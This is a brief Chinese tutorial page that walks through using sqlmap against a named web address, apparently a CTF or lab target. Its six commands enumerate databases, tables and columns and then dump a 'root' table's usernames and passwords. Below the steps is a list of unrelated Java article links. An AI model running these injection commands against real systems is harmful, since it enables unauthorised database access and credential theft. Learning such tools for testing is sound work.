Java教程
Sqlmap
本文主要是介绍Sqlmap,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
(1)输入python sqlmap.py,
(2)找到可能包含漏洞的文件地址,例如python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201",
由此看到包含三种漏洞。
(3)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" --dbs,找到符合要求的数据库,图为“jnng”
(4)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng --tables,查看数据库jnng中的所有表信息,找到可能包含密码或flag的列
(5)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root --columns,爆破列
(6)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root -C root_id,root_name,root_pass --dump,爆破列的相关信息
这篇关于Sqlmap的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Java语音识别项目资料:新手入门教程11-26
-
JAVA语音识别项目资料:新手入门教程11-26
-
Java语音识别项目资料:入门与实践指南11-26
-
Java云原生资料入门教程11-26
-
Java云原生资料入门教程11-26
-
Java云原生资料:新手入门教程11-26
-
Java创意资料:新手入门的创意学习指南11-25
-
JAVA对接阿里云智能语音服务资料详解:新手入门指南11-25
-
Java对接阿里云智能语音服务资料详解11-25
-
Java对接阿里云智能语音服务资料详解11-25
-
JAVA副业资料:新手入门及初级提升指南11-25
-
Java副业资料:入门到实践的全面指南11-25
-
Springboot应用的多环境打包项目实战11-25
-
SpringBoot应用的生产发布项目实战入门教程11-25
-
Viite多环境配置项目实战:新手入门教程11-25
栏目导航
